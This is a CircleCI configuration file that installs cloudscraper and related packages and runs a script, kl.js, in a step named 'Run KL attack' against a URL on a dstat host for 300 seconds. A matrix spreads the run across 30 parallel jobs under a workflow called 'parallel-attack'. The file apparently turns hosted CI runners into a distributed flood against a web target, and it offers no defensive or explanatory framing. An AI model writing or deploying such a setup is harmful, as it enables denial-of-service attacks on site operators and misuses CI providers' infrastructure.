version: 2.1

jobs:
  build-and-run:
    docker:
      - image: cimg/node:20.5
    resource_class: medium
    parameters:
      job-number:
        type: integer
        default: 1
    steps:
      - checkout
      - run:
          name: Install dependencies
          command: |
            sudo apt-get update
            sudo apt-get install -y build-essential
            npm install cloudscraper request randomstring
      - run:
          name: Run KL attack
          command: node kl.js https://c2.dstatbot.win/352db00b-5f01-4bc1-b414-8c7e4c127cf4 300 

workflows:
  version: 2
  parallel-attack:
    jobs:
      - build-and-run:
          matrix:
            parameters:
              job-number: [1,2,3,4,5,6,7,8,9,10,
                           11,12,13,14,15,16,17,18,19,20,
                           21,22,23,24,25,26,27,28,29,30]
